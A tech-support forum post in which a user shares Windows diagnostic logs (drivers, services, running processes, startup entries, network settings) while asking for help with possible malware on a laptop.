2015-07-16 05:04:41 ----D---- C:\Windows\PolicyDefinitions
2015-07-15 19:01:24 ----D---- C:\Program Files (x86)\Common Files\Adobe
2015-07-15 13:40:41 ----HD---- C:\Program Files (x86)\InstallShield Installation Information
2015-07-15 10:54:29 ----SD---- C:\ProgramData\Microsoft
2015-07-14 18:45:33 ----D---- C:\Windows\Prefetch
2015-07-14 18:37:49 ----D---- C:\Windows\AppCompat
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\Common Files\microsoft shared
2015-07-14 15:53:15 ----D---- C:\Windows\debug
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 mfehidk;McAfee Inc. mfehidk; C:\Windows\system32\drivers\mfehidk.sys []
R0 mfewfpk;McAfee Inc. mfewfpk; C:\Windows\system32\drivers\mfewfpk.sys []
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys []
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys []
R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys []
R2 McPvDrv;McPvDrv Driver; C:\Windows\system32\drivers\McPvDrv.sys []
R3 A6210;NETGEAR A6210 USB Wireless LAN Card Driver; C:\Windows\system32\DRIVERS\A6210.sys []
R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\ADIHdAud.sys []
R3 cfwids;McAfee Inc. cfwids; C:\Windows\system32\drivers\cfwids.sys []
R3 MBAMProtector;MBAMProtector; \??\C:\Windows\system32\drivers\mbam.sys []
R3 mfeaack;McAfee Inc. mfeaack; C:\Windows\system32\drivers\mfeaack.sys []
R3 mfeavfk;McAfee Inc. mfeavfk; C:\Windows\system32\drivers\mfeavfk.sys []
R3 mfefirek;McAfee Inc. mfefirek; C:\Windows\system32\drivers\mfefirek.sys []
R3 mfencbdc;McAfee Inc. mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys []
R3 mfesapsn;McAfee Process Start Notification Service; \??\C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [2015-09-02 37960]
R4 RegFilter;RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys []
S3 athr;Wireless PCI Adapter Driver Service; C:\Windows\system32\DRIVERS\athrx.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys []
S3 e1express;Intel(R) PRO/1000 PCI Express Network Connection Driver; C:\Windows\system32\DRIVERS\e1e6232e.sys []
S3 fssfltr;FssFltr; C:\Windows\system32\DRIVERS\fssfltr.sys []
S3 HipShieldK;McAfee Inc. HipShieldK; C:\Windows\system32\drivers\HipShieldK.sys []
S3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys []
S3 MBAMWebAccessControl;MBAMWebAccessControl; \??\C:\Windows\system32\drivers\mwac.sys []
S3 mfencrk;McAfee Inc. mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys []
S3 netr28ux;RT2870 USB Extensible Wireless LAN Card Driver; C:\Windows\system32\DRIVERS\netr28ux.sys []
S3 netr28x;Ralink 802.11n Extensible Wireless Driver; C:\Windows\system32\DRIVERS\netr28x.sys []
S3 NVHDA;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys []
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys []
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys []
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys []
S3 RtlWlanu;ADD-NWU275v2 Wireless LAN 802.11n USB 2.0 Network Adapter; C:\Windows\system32\DRIVERS\rtwlanu.sys []
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys []
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys []
S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys []
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys []
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys []
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys []
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys []
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdAppMgrSvc;Autodesk Application Manager Service; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [2015-09-07 1136520]
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-12-19 81088]
R2 Autodesk Content Service;Autodesk Content Service; C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe [2015-02-05 31160]
R2 c2cautoupdatesvc;Skype Click to Call Updater; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-05-01 1394816]
R2 c2cpnrsvc;Skype Click to Call PNR Service; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-05-01 1772672]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-04-12 103608]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 20992]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2009-07-14 20992]
R2 HitmanProScheduler;HitmanPro Scheduler; C:\Program Files\HitmanPro\hmpsched.exe [2015-08-30 127752]
R2 HomeNetSvc;McAfee Home Network; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [2015-09-02 157928]
R2 McAPExe;McAfee AP Service; C:\Program Files\McAfee\MSC\McAPExe.exe [2015-08-21 782608]
R2 mccspsvc;McAfee CSP Service; C:\Program Files\Common Files\McAfee\CSP\1.6.1008.0\McCSPServiceHost.exe [2015-07-23 1694152]
R2 McMPFSvc;McAfee Personal Firewall Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McNaiAnn;McAfee VirusScan Announcer; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McNeelUpdate;McNeel Update Service 5.0; c:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [2015-08-10 67944]
R2 mcpltsvc;McAfee Platform Services; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 McProxy;McAfee Proxy Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 mfemms;McAfee Service Controller; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [2015-07-15 373704]
R2 msdotnetserv_v2050729;Microsoft .Net Framework v2.0.50729 ALP (X86); C:\Program Files (x86)\Microsoft.NET\v2.0.507279\msnetcore.exe [2015-07-05 3003880]
R2 MSK80Service;McAfee Anti-Spam Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2015-07-21 368048]
R2 NetgearSwitchUSB;NetgearSwitchUSB; C:\Program Files (x86)\NETGEAR\A6210\NetgearSwitchUSB.exe [2014-05-13 210648]
R2 NVIDIA Performance Driver Service;NVIDIA Performance Driver Service; C:\Program Files\NVIDIA Corporation\Performance Drivers\nvPDsvc.exe [2009-05-14 4901888]
R2 nvsvc;NVIDIA Display Driver Service; C:\Windows\system32\nvvsvc.exe []
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service; C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-02-05 410952]
R2 wlidsvc;Windows Live ID Sign-in Assistant; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2012-07-17 2292480]
R3 McODS;McAfee Scanner; C:\Program Files\McAfee\VirusScan\mcods.exe [2015-07-17 639456]
R3 mfefire;McAfee Firewall Core Service; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [2015-06-29 232656]
R3 mfevtp;McAfee Validation Trust Protection Service; C:\Windows\system32\mfevtps.exe []
S2 0270371442166664mcinstcleanup;McAfee Application Installer Cleanup (0270371442166664); C:\Windows\TEMP\027037~1.EXE [2015-05-04 883024]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-04-11 124088]
S2 dbupdate;Dropbox Update Service (dbupdate); C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-07-23 134512]
S2 LiveUpdateSvc;LiveUpdate; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2015-07-29 2909472]
S2 MBAMService;MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-06-18 1133880]
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-07-09 327296]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-12 269000]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 20992]
S3 aspnet_state;ASP.NET State Service; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2014-04-11 50864]
S3 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files (x86)\Common Files\Autodesk Shared\Service\AdskScSrv.exe [2015-07-14 74360]
S3 dbupdatem;Dropbox Update Service (dbupdatem); C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-07-23 134512]
S3 FlexNet Licensing Service 64;FlexNet Licensing Service 64; C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe [2015-07-18 1369856]
S3 fsssvc;Windows Live Family Safety Service; C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2014-03-31 1512640]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe /V []
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2015-08-26 149160]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe []
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
-----------------EOF-----------------

Attached Files

info.txt (23.9 KB)

I posted the following thread in Laptop Support:

As we were unable to find the cause of the problem, Masterchiefxx17 decided that the best course of action would be to post in Virus/Trojan/Spyware Help.

Here is 'dds.txt':

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18015
Run by Oscar at 3:41:13 on 2015-09-15
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.44.1033.18.16300.11594 [GMT 1:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus *Enabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files\AuthenTec TrueSuite\TrueSuiteService.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k WbioSvcGroup
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\AuthenTec TrueSuite\TouchControl.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files (x86)\Google\Update\1.3.28.13\GoogleCrashHandler.exe
C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\AuthenTec TrueSuite\KeepSafe\fvsvr.exe
C:\Program Files (x86)\Google\Update\1.3.28.13\GoogleCrashHandler64.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Hotkey\PowerBiosServer.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Users\Oscar\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Oscar\AppData\Local\Amazon Music\Amazon Music Helper.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Program Files (x86)\Hotkey\Hotkey.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\AuthenTec TrueSuite\BioMonitor.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Common Files\AuthenTec\TrueService.exe
C:\Program Files (x86)\BlueStacks\HD-Agent.exe
C:\Program Files\Common Files\AuthenTec\TrueService.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\GWX\GWX.exe
C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
C:\Program Files (x86)\Hotkey\WRadio.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Samsung Magician\Samsung Magician.exe
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportService.exe
C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
C:\Program Files (x86)\BlueStacks\HD-Service.exe
C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
C:\Program Files (x86)\BlueStacks\HD-Network.exe
C:\Program Files (x86)\BlueStacks\HD-BlockDevice.exe
C:\Program Files (x86)\BlueStacks\HD-SharedFolder.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe
C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
mSearch Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
mWinlogon: Userinit = userinit.exe
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\office15\urlredir.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\Steam.exe" -silent
uRun: [ISUSPM] C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler
uRun: [OneDrive] "C:\Users\Oscar\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [Akamai NetSession Interface] "C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe"
uRun: [Amazon Music] "C:\Users\Oscar\AppData\Local\Amazon Music\Amazon Music Helper.exe"
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [BlueStacks Agent] C:\Program Files (x86)\BlueStacks\HD-Agent.exe
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\Hotkey.lnk - C:\Program Files (x86)\Hotkey\Hotkey.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MCAFEE~1.LNK - C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
uPolicies-Explorer: NoResolveTrack = dword:1
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: Send to Bluetooth - C:\Program Files (x86)\Intel\Bluetooth\btSendToObject.htm
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\onbttnie.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
TCP: NameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{5BD31AEB-B371-4B4B-B1EF-4CE37F7FBCAB} : DHCPNameServer = 137.73.254.10 159.92.254.10
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC} : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\244584572653D223349375 : DHCPNameServer = 192.168.1.254
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\2656C6B696E6E2634323 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\5735D23547574656E64736F6D6 : DHCPNameServer = 77.244.128.44 77.244.128.45
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\6796277696E6D65646961643938353230313F5548545 : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\D4567616265737D275966696 : DHCPNameServer = 10.0.0.1 10.0.0.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\E4544574541425 : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\F54586560234C6F65746 : DHCPNameServer = 10.1.5.153 10.1.5.154
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= C:\Windows\SysWOW64\nvinit.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\urlredir.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
x64-Run: [IAStorIcon] "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
x64-Run: [BLEServicesCtrl] C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
x64-Run: [BTMTrayAgent] rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
x64-Run: [KeepSafe] "C:\Program Files\AuthenTec TrueSuite\KeepSafe\fvsvr.exe" /startup
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [MSC] "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\onbttnie.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2013-10-4 42664]
R0 amdkmpfd;AMD PCI Root Bus Lower Filter;C:\Windows\System32\drivers\amdkmpfd.sys [2013-10-4 36096]
R0 aswNdisFlt;Avast! Firewall Driver;C:\Windows\System32\drivers\aswNdisFlt.sys [2015-8-14 454016]
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2014-9-28 65224]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2014-9-28 274808]
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-10-4 644968]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-10-4 28008]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-6-13 20464]
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R0 ngvss;ngvss;C:\Windows\System32\drivers\ngvss.sys [2015-8-14 115152]
R0 nvpciflt;nvpciflt;C:\Windows\System32\drivers\nvpciflt.sys [2015-9-1 31352]
R0 RapportHades64;RapportHades64;C:\Windows\System32\drivers\RapportHades64.sys [2015-6-21 139896]
R0 RapportKE64;RapportKE64;C:\Windows\System32\drivers\RapportKE64.sys [2013-11-8 394584]
R1 aswKbd;aswKbd;C:\Windows\System32\drivers\aswKbd.sys [2014-10-13 28144]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2014-9-28 1048344]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2014-9-28 447944]
